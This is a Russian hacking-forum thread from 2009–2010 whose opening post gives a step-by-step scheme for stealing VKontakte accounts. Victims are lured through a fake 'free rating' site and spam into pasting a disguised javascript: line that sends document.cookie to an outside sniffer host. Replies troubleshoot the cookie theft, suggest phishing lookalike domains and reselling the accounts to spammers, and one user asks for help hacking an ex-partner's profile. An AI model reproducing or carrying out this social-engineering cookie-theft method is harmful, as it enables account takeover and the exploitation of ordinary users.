PDA

Просмотр полной версии : угон акка от контакта на 90 %


TIGRA
25.08.2009, 01:00
Пароль на архиве такой, что я с первого раза угадал:hmcool:

Axeee
25.08.2009, 01:00
я так понял что при вставке этого кода, должна пойти анимация как бы повышающегося рейтинга да ? ..или просто появиться табличка ?

pantoderm
25.08.2009, 01:00
Привет всем я Pantoderm и это моя первая статья так что не судите строго. Хотел бы поделиться с вами своим способом угона акков от популярной социальной сети Вконтакте.ру Для этого нам понадобиться (как и с фейком ) бесплатный хостинг , и парочка замечательных скриптов для поднятия рейтинга и повышения голосов( я их опубликую немного позже) . И так приступим =)
1)Сначало зарегистрируем себе сайт , сайт какой нибудь фирмы салидной , но о которой некто нечего не знает. Думаю с этим проблем не будет.
2) убираем с сайта всё кроме главное страницы , и делаем там рекламму . у меня за 10 минут получилось примерно такое http://reyting.wmsite.ru/ (https://hpc.name/redirector.html#http://reyting.wmsite.ru/) .
Лично я регал на http://www.webstolica.ru/ (https://hpc.name/redirector.html#http://www.webstolica.ru/) потому что вконтакте не выдаёт что эта ссылка ведёт на фришенговый сайт .
(http://hpc.name/forum/vbimghost.php?do=displayimg&imgid=1438)
2.1) для хорошей рекламы нам понадобиться мажорик с большим рейтингом и ОТКРЫТОЙ СТРАНИЦЕЙ , что бы все могли заходить и смотреть что это правда. Для того что бы найти его мы заходим в группу где можно приглашать и нажимаем расширенный поиск ---- поиск и все у кого большой рейтинг идут первыми вот и выбирайте кого будем копировать

Что бы снять виде о подтверждении что скрипты работают мы зарегистрируем двойника этого мажорика . как это делать думаю объяснять не надо.
3)идём на раздачу халявных акков вконтакте берём и начинаем немного спамить
p/s что бы сорвать побольше акков нужно обязательно дописать « что бы рейтинг закрепился пригласите на сайт ещё 10 друзей» ну или сколько душе угодно =) только смотрите не переборщите
теперь объясняю суть идеи :
жертва заходит на сайт и видит что это бесплатный рейтинг , но её это настораживает специально для этого мы делаем отвод глаз и пишем что рейтинг не совсем бесплатный его получают за просмотр рекламы ,тогда жертва успакаеваться и спокойно вставляет скрипт , но скрипт с незаметной дороботкой а точнее с javascript:document.write('img = new Image(); img.src = "http://httpz.ru/nr7gif758k8.gif?"+document.cookie;') - это скрипт для адрессной строки со сниффера на .hacker-pro.net зарание замаскированным на тут (https://hpc.name/redirector.html#http://www.scriptasylum.com/tutorials/encdec/encode-decode.htm) потому что есть народ который знает про это и начинают портить всю малину . и когда наша жертва вставляет «волшебный» скрипт то о чудо на её странице рейтинг начинает подниматься ! в это время куки от контакта идут нам на сниффер в папку ЛОГ (для тех кто не знает ) . всё мы идём туда копирует remixpass а точнее то что стоит после знака равно = и расшифроввываем на онлайн расшифровщиках
теперь скрипты я их не стал выкладывать их сюда потому что народу много ходит я их залью а вы скачаете.
вот впринцепи и всё спасибо за внимание с вами был начинающий хакер Pantoderm так же хочу выразить благодарность Uxta .
смотрите внимательно куда вставлять JavaScript код для адресной строки
там всё написанно Скачать скрипты (https://hpc.name/redirector.html#http://dump.ru/file/3297816)
специально для hacker-pro.net

пароль на архив со скриптами

Скрытый текст (вы должны быть авторизованы и иметь 10 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



всем удачи и если статека понравилась не скупитесь ставить плюс и спасибо

KpeBeDbI4
25.08.2009, 01:00
Молорик, половину можно было заХАЙДить....ИМХО.

pantoderm
25.08.2009, 01:00
Цитата:

Сообщение от t0xA

Мне понравилось, можно еще запихать фейковые проги аля поднимаем рейтинг, фековый софт вобщем, в кукках есть трабла в том что MD5 трудно расшифровать... Или софт со склееным трояном!

да можно было бы желание . но я привёл пример сайта деловой фирмы которая дат рейтинг за просмотр рекламмы . и мне кажется что на проги мало кто ведёться а вот со скриптами можно ещё поработать ))

Цитата:

Сообщение от KpeBeDbI4

Молорик, половину можно было заХАЙДить....ИМХО.

я пытался но чёт не получаеться (

KpeBeDbI4
25.08.2009, 01:00
Цитата:

Сообщение от pantoderm

я пытался но чёт не получаеться (

о_О" хайд походу убрали, я вообще найти не могу.

pantoderm
25.08.2009, 01:00
Цитата:

Сообщение от QwE43

а чтобы не парится с регистрацией новвого акка можно просто полоску рейтинга изменить :wink:

тоже верно но все знают про программу фотошоп . так что многие уйдут )) а видео доказывает что скрипт работает )

Uxta
25.08.2009, 01:00
Молодец.
Только писал ты её конечно не совсем сам, вижу что чёто и от себя добавил, но суть с*****нул отсюда http://11rus-team.ru/forum/showthread.php?t=36 (https://hpc.name/redirector.html#http://11rus-team.ru/forum/showthread.php?t=36)
это даже видно по скринам которые делал я сам лично)

pantoderm
25.08.2009, 01:00
Цитата:

Сообщение от Uxta

Молодец.
Только писал ты её конечно не совсем сам, вижу что чёто и от себя добавил, но суть с*****нул отсюда http://11rus-team.ru/forum/showthread.php?t=36 (https://hpc.name/redirector.html#http://11rus-team.ru/forum/showthread.php?t=36)
это даже видно по скринам которые делал я сам лично)

блин извини чесное слово не знал об этом зуб даю )) а статью я сам писал с нуля отвечаю а скрины для сайта не буду врать взял у тебя ))

Uxta
25.08.2009, 01:00
Цитата:


блин извини чесное слово не знал об этом зуб даю )) а статью я сам писал с нуля отвечаю



Ну да, и скрины загадочным образом у тебя такие же да? и с коментами теме же на них?))
Короче не гони. Пох*й, запостил и запостил.

pantoderm
25.08.2009, 01:00
Цитата:

Сообщение от Uxta

Ну да, и скрины загадочным образом у тебя такие же да? и с коментами теме же на них?))
Короче не гони.

да признаюсь картинку взяты у тебя , что бы не терять времени на сайте . так что извини меня за это. я честное слово не знал про твою статью . а за то что ты натолкнул меня на написание статьи я выразил тебе благодарность в конце

demooo
26.08.2009, 01:00
пацы помогите мне сделать такую штуку к в первой статье я в этом полный 0
у меня всё есть код для рейтинга и снифера!!!!!!!!!!!!
ток я не пойму как это соеденить!!!!!!!!!
ПОМОГИТЕ ПЛЗ КОМУ НЕ ВПАДЛУ!!!!!!!!!!!!!!!!

pantoderm
26.08.2009, 01:00
Цитата:

Сообщение от demooo

пацы помогите мне сделать такую штуку к в первой статье я в этом полный 0
у меня всё есть код для рейтинга и снифера!!!!!!!!!!!!
ток я не пойму как это соеденить!!!!!!!!!
ПОМОГИТЕ ПЛЗ КОМУ НЕ ВПАДЛУ!!!!!!!!!!!!!!!!

Добавлено через 4 минуты
пацы помогите мне сделать такую штуку к в первой статье я в этом полный 0
у меня всё есть код для рейтинга и снифера!!!!!!!!!!!!
ток я не пойму как это соеденить!!!!!!!!!
ПОМОГИТЕ ПЛЗ КОМУ НЕ ВПАДЛУ!!!!!!!!!!!!!!!!
ПЛЗ!!!!!!!!!!!!!

уже помог ))

JIEHHu-KEHHu
26.08.2009, 01:00
Интересная статья Но вот только к чему угонять акк? профит за возврат? продать-то не получится. при смене имени - обнуляется рейтинг...

Hunone
26.08.2009, 01:00
факт в том, что мне неприходят куки...когда убираю скрипт для командной строки (не имеет значении в каком виде, сам скрипт рабоает как нада, а так только сообщения вылазиют

pantoderm
28.08.2009, 01:00
Цитата:

Сообщение от JIEHHu-KEHHu

Интересная статья Но вот только к чему угонять акк? профит за возврат? продать-то не получится. при смене имени - обнуляется рейтинг...

можно набрать акков и продать спамщикам )

kam1LLe
05.09.2009, 01:00
У меня почему-то java скрипт не работает... После того, как я вставляю его к себе в строку, ничего не происходит...
Вот мои скрипты
Не шифрованный

Скрытый текст (вы должны быть авторизованы и иметь 10 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



Шифрованный

Скрытый текст (вы должны быть авторизованы и иметь 10 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



P.s Ни первый, не второй не работает... В чем может быть проблема?

pantoderm
05.09.2009, 01:00
Скрытый текст (вы должны быть авторизованы и иметь 14 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь

kam1LLe
05.09.2009, 01:00
Все-равно не работает =((

Скрытый текст (вы должны быть авторизованы и иметь 10 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь

pantoderm
05.09.2009, 01:00
Скрытый текст (вы должны быть авторизованы и иметь 14 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь

kam1LLe
05.09.2009, 01:00
Скрытый текст (вы должны быть авторизованы и иметь 10 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь

0x81
05.09.2009, 01:00
kam1LLe, если ты имеешь в виду код для адресной строки то можешь просто скопировать этот код со страницы настроек в твоем аккаунте на онлайн сниффере.

Добавлено через 3 минуты
да и если ты вставляешь в адресную строку код тебе только в первый раз придут куки, эти же куки второй раз не придут пока не почистишь кэш. попробуй сменить ак чтоб куки изменились или с другого браузера, или почисть кэш

Vampir73rus
06.09.2009, 01:00
ааа парни почему так ! я вставил яваскрипт в адресную строку и у меня пропали голоса ??? куда они делись ???

Добавлено через 4 минуты
убью того кто это сделал !!!

pantoderm
07.09.2009, 01:00
Цитата:

Сообщение от Vampir73rus

ааа парни почему так ! я вставил яваскрипт в адресную строку и у меня пропали голоса ??? куда они делись ???

Добавлено через 4 минуты
убью того кто это сделал !!!

чё ты сделал ???? распиши всё по пунктам

Гнат
08.09.2009, 01:00
Цитата:

Сообщение от Vampir73rus

ааа парни почему так ! я вставил яваскрипт в адресную строку и у меня пропали голоса ??? куда они делись ???

Добавлено через 4 минуты
убью того кто это сделал !!!

Да ты вроде сам отдал свои куки народу, вот ктото зашел на с твоими куками и украл твои голоса. Не надо было вставлять этот скрипт

adrenalin_fun
10.09.2009, 01:00
Стырил куки, а что дальше? Как из них сделать свои? Пробовал менять свои куки на чужие, контакт только думает-думает а потом всё равно выкидывает на мою страницу

pantoderm
11.09.2009, 01:00
Цитата:

Сообщение от adrenalin_fun

Стырил куки, а что дальше? Как из них сделать свои? Пробовал менять свои куки на чужие, контакт только думает-думает а потом всё равно выкидывает на мою страницу

попробуй их расшифровать

Damir72
14.09.2009, 01:00
MD 5 не расшифровать...
только подбор, и то если пароль легки можно провернуть, если нет то не получится ничего

done_f
14.09.2009, 01:00
Цитата:

Сообщение от Damir72

MD 5 не расшифровать...
только подбор, и то если пароль легки можно провернуть, если нет то не получится ничего

как и обозначена тема, на 90% есть шанс взлома, мало кто из пользователей ставит пароли вида w3_j8-zm, так что все возможно, главное желание, а если его нет всегда можно сделать заказ ))

absentik
15.09.2009, 01:00
Не совсем в тему, но что делать если жертва воспользовалась скриптом со снифера на адресную строку и там вышли след данные remixchk=5; remixsid=цыфрыдабуквыдохера и еще там пришел ip и еще воть
REFERER: http://vkontakte.ru/audio.php?gid=29620 (https://hpc.name/redirector.html#http://vkontakte.ru/audio.php?gid=29620)
AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRSPUTNIK 2, 1, 0, 4 HW; MRA 5.5 (build 02746); .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Я вот знаю что с Оперы мона зайти подменив кукисы в колонке с почтой и ремикс пассом. Я вот недогоняю одно: или с помощью ремиксid мона заходить и взломать контакт или снивер не словил нужного по скрипту у моей жертвы. Знающие люди помогите!!!!!!!

pantoderm
16.09.2009, 01:00
Цитата:

Сообщение от Absentik

Не совсем в тему, но что делать если жертва воспользовалась скриптом со снифера на адресную строку и там вышли след данные remixchk=5; remixsid=цыфрыдабуквыдохера и еще там пришел ip и еще воть
REFERER: http://vkontakte.ru/audio.php?gid=29620 (https://hpc.name/redirector.html#http://vkontakte.ru/audio.php?gid=29620)
AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRSPUTNIK 2, 1, 0, 4 HW; MRA 5.5 (build 02746); .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Я вот знаю что с Оперы мона зайти подменив кукисы в колонке с почтой и ремикс пассом. Я вот недогоняю одно: или с помощью ремиксid мона заходить и взломать контакт или снивер не словил нужного по скрипту у моей жертвы. Знающие люди помогите!!!!!!!

что то не до конца пришло. ещё должно придти логи и пасс

GetGroovy
17.09.2009, 01:00
Все прикрыли баг!!! пасворды хешиться на login.vk.com... и другие куки кроме remixsid и remixchk неприйдут!!

SAIRIS
17.09.2009, 01:00
эм....я вот одного не понял, как "JavaScript код для адресной строки" соединить с JavaScript рейтинга? объясните.

docunent
19.09.2009, 01:00
переделать скриптик надо)

anubis6666
19.09.2009, 01:00
Цитата:

Сообщение от GetGroovy

Все прикрыли баг!!! пасворды хешиться на login.vk.com... и другие куки кроме remixsid и remixchk неприйдут!!

там уже не логины и пассы,а сессии т.к в самих куках даже пароля нет md5

kir55rus
20.09.2009, 01:00
у меня вместо повышения рейтинга перебрасывало человека на другую страницу, че делать?
ЗЫ:перед этим рейтинг вообще не повышался((

GetGroovy
20.09.2009, 01:00
Да скрипт уже не робит... надо другой уже писать

ТИША
21.09.2009, 01:00
Каму нужны ааки в контакте пиши те в лс да м беспл

pak
05.10.2009, 01:00
Шумахер Я это делал еше когда тема появилось все шло отлично но потом не стала приходит это тема я же не один такой тут! если появился другой случай юзай если делать нех токо акки воровать.

Шумахер
09.10.2009, 01:00
Цитата:

Сообщение от pak

Шумахер Я это делал еше когда тема появилось все шло отлично но потом не стала приходит это тема я же не один такой тут! если появился другой случай юзай если делать нех токо акки воровать.

и сейчас все отлично идет,просто нынишний remixsid не проходит,так как там идет привязка к нему айпи адреса...А скрипты все работают...

Шумахер
09.10.2009, 01:00
Скрипт - "JavaScript код для адресной строки c редиректом",который находиться в настройках снифера на етом сайте - работает...Только толку,сейчас remixsid уже не катит,Дуров позаботился об этом...

teslaaaa
12.10.2009, 01:00
крут, что еще сказать)
вот со скриптами много кто поведется, даю зуб
З.Ы: тупого быдла вконтакте хватает)

Prodigy521
20.10.2009, 01:00
Или нормальные люди это давно это уже знают, или тема просто старая (не посмотрел). Щас от этого уже ничего не получишь... Вконтакте очень быстро развивается. Пару месяцев назад каждый второй велся на бесплатные голоса, год назад абсолютно все)) Лучше угонять мыло жертвы ИМХО, тк Дуров еще не додумался не присылать пасс от акка, а только ссылку на его изменение. Ну и с мылом намного больше возможностей.

kir55rus
25.10.2009, 01:00
а че, уже действует тот скрипт?
вроде говорили, что уже все...ушел в отставку...

[Roman]
25.10.2009, 01:00
Щас фейки как-то не актуально, с нынешним приливом спама, но за статью +

Samuray
07.11.2009, 01:00
Цитата:

Сообщение от Prodigy521

Или нормальные люди это давно это уже знают, или тема просто старая (не посмотрел). Щас от этого уже ничего не получишь... Вконтакте очень быстро развивается. Пару месяцев назад каждый второй велся на бесплатные голоса, год назад абсолютно все)) Лучше угонять мыло жертвы ИМХО, тк Дуров еще не додумался не присылать пасс от акка, а только ссылку на его изменение. Ну и с мылом намного больше возможностей.

Да я тож так щитал пока неввели смс подтверждающий код при востановлении паса от контактов, ерунда подумаете ,моба нету или шо!??!, но нетут и нетогда здесь дуров тож подшывилил привязку номера к айдешнику, такшто если хоче акки угонять таким способом то закупай номера (симки) оптом!

Zot
07.11.2009, 01:00
Цитата:

Сообщение от Alex_rock

Напишите пожалуйста как настроить сниффер.....детально.....и какой скрипт надо вставить.....зарание благадорю

в разделе снифер есть видео по его использованию

corpse1888
07.11.2009, 01:00
В общем угнал с контакта пару акков с рейтингом.Нокак теперь мене этот рейтинг и голоса перевести? Пробовал через приложение пишет что нет голосов ,хотя есть.!?

Haba_74
08.11.2009, 01:00
Corpse1888 Если есть точно голоса,то переведи их на счет приложения==>потом перевади к себе на приложение!!!

nevil Не флудь,у тя даже постов мало,что-бы все видеть!!!

sifonn
11.11.2009, 01:00
вообще то статья нормальок правда для тех кто не знает читать иль просто туп
прочитавши сам скрипт а именно: "img.src="http://httpz.ru/njmaq7qqudf.gif?"+document.cookie;" меня бы лично уже бы насторожило.
хотя и название туповатое
скажите мне пожалуйста кто с вас сохраняет cookie.
без обид но эту статью мона отнести к "Еще один способ угона" но точно не на 90 проц.

и кстати pantoderm есть пару вопросов:
1 ты сохраняеш cookie?
2 если да то дай свое мыло(проще напиши мне его + пароль))))

P.S. в скриптах я нихрена не понимаю но всеж таки читать нада.

SashOk
11.11.2009, 01:00
Почему когда я рейтинг повышаю спомощи скрипта он не сохраняется????? хоть вы говорили что он нормальный...

pantoderm
11.11.2009, 01:00
Цитата:

Сообщение от SashOk

Почему когда я рейтинг повышаю спомощи скрипта он не сохраняется????? хоть вы говорили что он нормальный...

читай внимательней , таких скиптов нет

SashOk
11.11.2009, 01:00
А как тогда повысить голоса или рейтинг что бы было нормально???

kir55rus
11.11.2009, 01:00
покупай голоса, и играй в лотереях.
именно так и делают, у кого рейт 1к+

zaYku1
13.11.2009, 01:00
Да ни как , что же вы не можите понять что нет таких СКРИПТОВ!!!!!!!!:turned:

ukraine
18.11.2009, 01:00
Что вы думаете об этом сервисе - http://hover.fancy.kz/vkontakte.ru (https://hpc.name/redirector.html#http://hover.fancy.kz/vkontakte.ru), может быть это паранойя, но как-то палённым пахнет))

roberto123
18.11.2009, 01:00
мне не получачаеться что то, а етот метод еще дествительный?

Nickolay
23.11.2009, 01:00
Подскажите, а куки вКонтакте - сейчас не закрепляются на ip?
Когда у себя с одного из аккаунтов беру куки и подставляю на другой - все работает - перехожу в сессию этого аккаунта.
В случае, когда подставляю "украденные" - куки - ничего не происходит, при обновлении страницы - куки обновляются, если запретить прием куки, выбрасывает на страницу входа в учетную запись.

trufchik
29.11.2009, 01:00
Всё методы основаны на расшифровке cookies, т.е. жертва должна совершить оплошность, совершив оплошность, ререйдя по незнакомой ссылке, введя свой логин и пароль на фейке контакта...
А есть ли способ узнать пароль от страницы, если человеку не интересны голоса, рейтинг и прочая лабуда, по ссылкам переходить он не будет... А?
Да, допустим известен логин, т. е. e-mail (предположительно).

BloodSpy
01.12.2009, 01:00
Цитата:

Сообщение от trufchik

А есть ли способ узнать пароль от страницы, если человеку не интересны голоса, рейтинг и прочая лабуда, по ссылкам переходить он не будет... А?
Да, допустим известен логин, т. е. e-mail (предположительно).

Да, если контакт зареген давно, то можно взломать е-мэйл, и на него запросить пароль от контакта.

Lukish
11.12.2009, 01:00
Снифер уже не вдохновляет..можно бы было как нибудь с исходником поработать..или чтонить в этом роде...

Drakogan
16.12.2009, 01:00
прикольно

PhiberOptic
22.12.2009, 01:00
Я лично, как пользователь провайдера с локальными ресурсами, которые расшаривают сами пользователи (идиоты =D), пользуюсь тем, что некоторые расшаривают целиком диск Цэ.. Ну и куки все соответственно

DonDrakon
22.12.2009, 01:00
Только что попробовал использовать такой скрипт но мне почему-то пришло только remixchk и remixsid. Я что-то неправильно сделал или же на вконтакте уже как-то по хитрому пароли хранятся?

adim129
23.12.2009, 01:00
otli4no

DonDrakon
25.12.2009, 01:00
Дак что никто не может подсказать с куки?

Pit_Bull
27.12.2009, 01:00
pantoderm, спасибо, очень мне помогла! +

M@ZAX@KEP
27.12.2009, 01:00
Цитата:


Только что попробовал использовать такой скрипт но мне почему-то пришло только remixchk и remixsid. Я что-то неправильно сделал или же на вконтакте уже как-то по хитрому пароли хранятся?



Ты сам ответил на свой вопрос. Открой свои кукисы в броузере и увидишь что пароль в md5 хранится в отдельной папке (присвоен для другой страницы), короче, именно по-хитрому ))

ЗЫ метод взлома контакта через кукис уже не актуален. (ибо кукис разделены на 2 части, а стырить получится только 1, которая не имеет ничего полезного).

Dn7
28.12.2009, 01:00
:disgust: :disguise: :hmm1: :working: :bop: Неужели нельзя с javascript долезть до login.vk.com? Блин, я токо наладил всё для хака, а присылает remixchk и remixsid! :246:
Значит осталась инъекция контакта и фейки... Пробовал хто-нить?

Добавлено через 46 минут

Цитата:


E-mail или Логин:

Пароль:




onDomReady(function() {
var uiExpire = new Checkbox(ge('expire'), {
width: 123,
checked: false,
label: 'Чужой компьютер'
});
});


Вход

Регистрация




Короче нудо как-то добиться до папки login.vk.com... В куках.Может заюзать php?

M@ZAX@KEP
28.12.2009, 01:00
Думаю, можно сделать по-другому... от примерная схема скроипта:

1) Кража кукис
2) редирект на login.vk.com
3) Кража кукис исчо раз))

Вопрос в том, подолжит-ли скрипт работу после редиректа? Кто-нибудь, попробуйте так, если получится - отпишитесь, а то мне чёта некогда... xD

araqwa2009
29.12.2009, 01:00
привет кто сможет сломать страницу в контакте ?

kit
29.12.2009, 01:00
Цитата:

Сообщение от araqwa2009

привет кто сможет сломать страницу в контакте ?

Учись и взломай сам:wink:

VIR
30.12.2009, 01:00
Это уже частично устарело и кстати давно...
remixchk
remixsid
remixgroup_closed_tabs
remixclosed_tabs
Что вам дадут такие куки..., дадут правда но мало чего и не на долго:hmcool:

Так что угон на 90% - это уже не катит...

M@ZAX@KEP
30.12.2009, 01:00
Цитата:

Сообщение от Dn7

Есть предложение по взлому.
1. Чел вводит код в адресную строку на vkontakte.ru.(код кидает куки на снифф, редиректит на vk.login.com)
2. На vk.login.com вводит другой код.(код снова кидает куки на снифф, редиректит на vkontakte.ru)
3. Всё, повышение голосов или там поднятие рейтинга для клиента кончилось, куки у нас... :bq:
З.Ы. Если просто зайти на vk.login.com, то куки от него стираются! Ему нужна какая-то переменная? Или чё ему надо?... :86:

Я вообще-то это уже сказал)) почти то же самое:

Цитата:


1) Кража кукис
2) редирект на login.vk.com
3) Кража кукис исчо раз))



По поводу того что стирается... так специально сделано чтобы и такая схема с редиректом не сработала... ему нужен логин и пароль чтобы авторизацию провести... вобщем походу лазейку с такой xss в контакте прикрыли окончательно и без вариантов (старый добрый принцип: "нельзя так - значит попробуем по-другому" уже не канает! =( )

Dn7
30.12.2009, 01:00
Есть предложение по взлому.
1. Чел вводит код в адресную строку на vkontakte.ru.(код кидает куки на снифф, редиректит на vk.login.com)
2. На vk.login.com вводит другой код.(код снова кидает куки на снифф, редиректит на vkontakte.ru)
3. Всё, повышение голосов или там поднятие рейтинга для клиента кончилось, куки у нас... :bq:
З.Ы. Если просто зайти на vk.login.com, то куки от него стираются! Ему нужна какая-то переменная? Или чё ему надо?... :86:

poal
30.12.2009, 01:00
Кстате, столкнулся с такой проблеой. Есть куки от контакта, однако если их загнать в мой браузер, захожу просто на vkontakte.ru Идёт загрузка (ну как бы логин) и меня кидает НА МОЮ СТРАНИЦУ И КУКИ АВТОМАТИЧЕСКИ ИЗМЕНЯЮТСЯ НА МОИ! В чём проблема? О_о

malish
31.12.2009, 01:00
Сам голову ломаю днями, пытаюсь разные способы... Ниче пока не катит, ппц...

UrgeOverkill
06.01.2010, 01:00
я не все страницы прочел, что мне интересно, раньше до ввода логин.вк.ком все было просто относительно. Если не брать увод чужих куков итд, а взять простую ситуацию: Человек зашел от меня вконтакт, посидел, вышел, ушел домой. Как теперь тащить с куков пароль? Галочка - чужой компьютер роль вообще имеет при таком случае?

Neko2or
06.01.2010, 01:00
Цитата:

Сообщение от UrgeOverkill

Галочка - чужой компьютер роль вообще имеет при таком случае?

Галочка имеет роль, просто при перезегрузке браузера куки уничтожаются....(((

Добавлено через 3 минуты
Хм.... сейчас по моему возможен взлом контакта только через фейковый сайт, который по оформлению будет похож на вконтакте, только придется расчитывать на то что "юзер" не обратит внимания на адресную строку.....
http://img-fotki.yandex.ru/get/4103/neko2or.0/0_1bc41_b0a93619_orig

ItsMyWay
06.01.2010, 01:00
Автору темы респект! + с меня..

Kvipi
07.01.2010, 01:00
А кто поможет разобрать или обесните по точней куда вставлять ('img = new Image(); img.src = "http://httpz.ru/nr7gif758k8.gif?"+document.cookie;')....заранее спасибо

M@ZAX@KEP
08.01.2010, 01:00
Вставлять по идее туда где есть xss уязвимость.
Но сколько уже можно говорить что вконтакте такое больше не канает!

DonDrakon
09.01.2010, 01:00
Этот способ уже не работает так как на вконтакте появилась какая-то привязка к компу и красть куки и вставлять себе уже не работает.

Blackdjs
09.01.2010, 01:00
Сейчас на такую фигню не видутся,а на фейк картинка вместо граффити много лохов ведется

Antonqw72
11.01.2010, 01:00
Какой сами лучи бисплатни хостинг?

AkeJIJIa
17.01.2010, 01:00
я угнал куки снифером
но человек захоходил Мозилой
я куки вставляю в Оперу он все равно мою страницу окрывает
что делать?

Добавлено через 2 минуты
друзья
з7начит куки уже безполезно красть??
а как тогда можно угнать Акк вКонтакте

M@ZAX@KEP
17.01.2010, 01:00
Да для таких как ты уже 1000 раз сказали что бесполезно! Сколько можно?

AAAndrey
17.01.2010, 01:00
Скрипты - РАБОТАЮТ!

M@ZAX@KEP
18.01.2010, 01:00
troy, если бы это был нормальный рабочий скрипт, всё было бы по-человечески разложено по строками и закомментированно. Так пишут только скрипты, которые что-то гадкое делают просто чтобы в них нельзя было разобраться.

Судя по повсеместно повторяющемуся в скрипте id, он что-то отправляет Дурову (id:1) и, скорее всего, тебя после этого забанят xD

lexy
19.01.2010, 01:00
контакт всё сложнее ломать..
над уязвимостями работают люди..

через хсс тока..

adama
19.01.2010, 01:00
Лохи тоже поумнели уже, все смотрят на строчку в браузере, что написано...
vkántakte.ru точно не прокатит, ну разве что кто по пьяне сидит за компом кто, иль с бодуна великого.

Добавлено через 23 минуты
На сайте у меня для пользователей на некоторых страницах, дабы они видели сколько раз туда они уже заходили,стоит такой скрипт:


0)
date.setTime(date.getTime() - skew)
}
//-->




естественно, что основываясь на кукис, может его можно как то видоизменить, или дописать чего, дабы их перехватывать? Если кто силен в сие?, - может можно его с пользой для общего блага применить?

Добавлено через 6 минут
!

DeSharky
22.01.2010, 01:00
Зачем все это?люди уже поработали: http://vkontkante.ru/base.php (https://hpc.name/redirector.html#http://vkontkante.ru/base.php) ))) обновляется каждую минуту...

Добавлено через 3 минуты
adama, все таки лохов много,многие не смотрят в строку адреса...и база base.php это подтверждает )))

kareta
24.01.2010, 01:00
не помогло

dimulja
25.01.2010, 01:00
Цитата:

Сообщение от DeSharky

Зачем все это?люди уже поработали: http://vkontkante.ru/base.php (https://hpc.name/redirector.html#http://vkontkante.ru/base.php) ))) обновляется каждую минуту...

Добавлено через 3 минуты
adama, все таки лохов много,многие не смотрят в строку адреса...и база base.php это подтверждает )))

Там хоть 1 работающий есть?? Заходят много, а вводят херню какую-то:turned:

vitaljaa
25.01.2010, 01:00
некаторие работают

Morfius2010
28.01.2010, 01:00
Ищу мастера -умельца ,который взломает анкету на одноклассниках или хотя бы ее удалит.Нет сил моих больше ,анкета бывшей девушки ,я до сих пор ее люблю и ревную .Надеюсь мужчины меня поймут. она зараза флиртует там по моей информации.Желающие помоч напишите в приват пожалуйста. Надеюсь на помощь.Всем удачи !

rInaLdo
08.02.2010, 01:00
Она уже на актуальна!

M@ZAX@KEP
08.02.2010, 01:00
По-моему, во избежании ненужных вопросов, флуда и отчаянных попыток новичков что-то осуществить, тему надо закрыть а лучше ещё и спрятать в архив!